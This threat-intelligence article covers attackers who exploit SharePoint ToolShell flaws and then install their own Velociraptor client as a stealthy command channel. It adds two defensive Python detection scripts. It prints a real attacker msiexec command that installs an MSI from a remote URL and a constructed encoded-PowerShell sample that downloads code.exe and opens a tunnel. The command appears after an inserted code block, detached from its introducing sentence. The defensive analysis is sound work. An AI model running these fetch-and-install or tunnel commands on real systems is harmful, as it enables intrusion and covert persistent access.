Threat actors are increasingly turning legitimate security tools against the networks they were meant to protect. A recent case is the abuse of Velociraptor, a widely used Digital Forensics and Incident Response (DFIR) tool. Attackers deploy their own Velociraptor client to establish a stealthy Command and Control (C2) channel, which lets them execute commands and keep persistent access inside compromised networks while the traffic and binaries look like sanctioned security tooling. The tactic was observed in campaigns throughout late 2025 that targeted enterprise infrastructure such as Windows Server Update Services (WSUS) and Microsoft SharePoint and, in some intrusions, delivered the Warlock ransomware.
Huntress analysts identified the pattern after investigating three separate incidents between September and November. Overlapping artifacts, such as the attacker hostname DESKTOP-C1N9M, tied the activity to a financially motivated threat group tracked as Storm-2603. The adversaries showed solid operational security, using Cloudflare tunnels and digitally signed binaries to evade endpoint defenses and avoid network blocklists.
Exploiting SharePoint for Stealthy Access and Velociraptor Deployment
The infection chain relies on the "ToolShell" vulnerability chain in Microsoft SharePoint. Attackers first bypass authentication using CVE-2025-49706 by sending specially crafted HTTP POST requests to the /_layouts/15/ToolPane.aspx endpoint. That bypass is then chained with a remote code execution vulnerability, CVE-2025-49704, to write a web shell into a legitimate page such as start.aspx.
The intrusion leaves traces in the IIS access logs, particularly unauthenticated POST requests to /_layouts/15/ToolPane.aspx and other unexpected activity under /_layouts/15/. Once the web shell is in place, the threat actors use it to download and install Velociraptor through Windows Installer, which can fetch an MSI package directly from a URL. A command commonly observed in these attacks is:
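The following detection over IIS W3C access logs is an added example and is not code from the Huntress write-up or from any SharePoint tooling. It parses the default W3C extended format and reports every POST to /_layouts/15/ToolPane.aspx, the endpoint named above for the CVE-2025-49706 bypass. Treating an empty cs-username ("-") together with a 2xx status as the bypass signature is an assumption (authenticated POSTs to ToolPane.aspx can be legitimate page editing), and the log lines are constructed.

```python
"""Flag ToolShell-style requests in IIS W3C access logs.

Added example, not from the Huntress write-up or from SharePoint tooling.
Parses the default W3C extended format (the #Fields header names the columns)
and reports every POST to /_layouts/15/ToolPane.aspx. Treating an anonymous
user ("-") plus a 2xx status as the bypass signature is an assumption; the
sample log lines are constructed.
"""
import ipaddress
from collections import Counter

TOOLPANE = "/_layouts/15/toolpane.aspx"
# RFC 1918 ranges treated as "inside the network"; adjust to your environment
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

SAMPLE_LOG = r"""
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-10-02 03:14:07 10.0.0.5 GET /sites/hr/default.aspx - 443 CONTOSO\jdoe 10.0.4.22 Mozilla/5.0 - 200 0 0 120
2025-10-02 03:15:41 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.77 python-requests/2.32 - 200 0 0 311
2025-10-02 03:15:42 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.77 python-requests/2.32 - 200 0 0 298
2025-10-02 03:16:05 10.0.0.5 GET /_layouts/15/start.aspx - 443 - 203.0.113.77 python-requests/2.32 - 200 0 0 44
2025-10-02 03:20:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 CONTOSO\admin 10.0.4.9 Mozilla/5.0 https://sp.contoso.local/sites/hr/default.aspx 200 0 0 90
"""


def parse_w3c(text):
    """Yield one dict per request; column names come from the last #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def is_internal(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL)


def find_toolpane_posts(text):
    """Every POST to ToolPane.aspx, annotated with the signals worth triaging."""
    hits = []
    for rec in parse_w3c(text):
        if rec["cs-method"].upper() != "POST" or rec["cs-uri-stem"].lower() != TOOLPANE:
            continue
        hits.append({
            "time": rec["date"] + " " + rec["time"],
            "client": rec["c-ip"],
            "user": rec["cs-username"],
            "status": int(rec["sc-status"]),
            "user_agent": rec["cs(User-Agent)"],
            "unauthenticated": rec["cs-username"] == "-",
            "external": not is_internal(rec["c-ip"]),
        })
    return hits


def high_confidence(hits):
    """Anonymous POSTs that succeeded: ToolPane normally requires an authenticated editor."""
    return [h for h in hits if h["unauthenticated"] and 200 <= h["status"] < 300]


def by_client(hits):
    """Request count per client IP, to see who is hammering the endpoint."""
    return Counter(h["client"] for h in hits)


if __name__ == "__main__":
    hits = find_toolpane_posts(SAMPLE_LOG)
    for h in high_confidence(hits):
        print(h["time"], h["client"], h["user_agent"], "status", h["status"])
    print(by_client(hits))
```

Run it against the real log directory (each file with a `#Fields:` header) and pivot on the client IPs that `high_confidence` returns; a follow-up request to start.aspx from the same client, as in the constructed sample, is where the web shell would be exercised.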
msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi
The installer registers Velociraptor as a Windows service, so the implant survives reboots; the new service shows up as a service installation event (System log event ID 7045) and as a new autorun entry, which is where this foothold was spotted in the analysis. With the client running, the attackers use Velociraptor to execute Base64-encoded PowerShell commands (the -EncodedCommand form). These scripts download Visual Studio Code (code.exe) and start outbound VS Code tunnels, so the attackers' remote access rides on what looks like ordinary developer traffic.
The logs that Visual Studio Code writes while the tunnel is created give further insight into the attackers' methodology, and they mark the pivot from a DFIR tool deployed for persistence to broader control of the network. Combining vulnerability exploitation with the misuse of security tooling like Velociraptor makes it hard to tell genuine incident response from an active intrusion by looking at the binaries alone; the practical test is provenance. A Velociraptor client that the incident response team did not deploy, installed from an arbitrary URL by the IIS worker process and reporting to an unknown server, is an intrusion regardless of how trusted the tool is. Detection therefore has to focus on abnormal use of tooling and on network traffic originating from unexpected hosts and processes.
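The process-creation triage below is an added example, not Huntress or Velociraptor project code, covering the chain just described: msiexec pulling an MSI from a URL, processes spawned by the IIS worker process or by the Velociraptor client, and encoded PowerShell that fetches code.exe and starts a tunnel. The event field names (modelled on Sysmon Event ID 1), the Velociraptor install path and the sample events are assumptions; the encoded command is built in the block so that it decodes correctly.

```python
"""Triage Windows process-creation events for the Velociraptor abuse chain.

Added example, not Huntress or Velociraptor project code. Event field names
(image, parent_image, command_line) follow Sysmon Event ID 1 loosely and are
assumptions, as is the Velociraptor install path; the sample events are
constructed.
"""
import base64
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# -e / -ec / -enc / -EncodedCommand followed by the Base64 blob (simplified:
# PowerShell also accepts other unambiguous prefixes of EncodedCommand)
ENC_RE = re.compile(r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b", re.I)
TUNNEL_RE = re.compile(r"\bcode(?:\.exe)?\b.*\btunnel\b", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Return a list of finding strings for one process-creation event."""
    image = event["image"].lower()
    parent = event.get("parent_image", "").lower()
    cmd = event["command_line"]
    findings = []
    effective = cmd  # the text inspected after any decoding
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded PowerShell command")
            effective = decoded
    if image.endswith("msiexec.exe") and URL_RE.search(cmd):
        findings.append("msiexec install from remote URL")
    # SharePoint runs inside the IIS worker process, so a web shell's children share that parent
    if parent.endswith("w3wp.exe"):
        findings.append("spawned by IIS worker process")
    if parent.endswith("velociraptor.exe"):
        findings.append("spawned by Velociraptor client")
    if DOWNLOAD_RE.search(effective):
        findings.append("downloader in command")
    if TUNNEL_RE.search(effective):
        findings.append("VS Code tunnel")
    return findings


def encode_powershell(script):
    """Build the -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; the tunnel script is what an attacker's encoded command might contain
TUNNEL_SCRIPT = ('$p = "$env:TEMP\\code.exe"; '
                 'Invoke-WebRequest -Uri https://example.invalid/code.exe -OutFile $p; '
                 '& $p tunnel')
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": "msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Velociraptor\Velociraptor.exe",  # assumed install path
     "command_line": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(TUNNEL_SCRIPT)},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"msiexec /i C:\installers\app.msi /qn"},
]


def triage_all(events):
    return [triage(e) for e in events]


if __name__ == "__main__":
    for event, findings in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(event["image"].rsplit("\\", 1)[-1], "->", findings or "clean")
```

The benign events (an administrator's signed script and a local MSI install) produce no findings, which is the point of keying on parent process and remote URL rather than on the binaries themselves: msiexec, PowerShell and code.exe are all legitimate, and only their provenance separates the two cases.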
The implications are considerable. Abusing legitimate tools not only makes operations stealthier but also widens the potential impact, because those tools are already trusted and widely deployed in enterprise environments. Defenders will need to identify misuse of benign software, which requires a clear picture of how that software is normally deployed and used in their own network so that deviations stand out. As such campaigns continue to surface, information sharing and prompt analysis of new indicators of compromise will remain essential.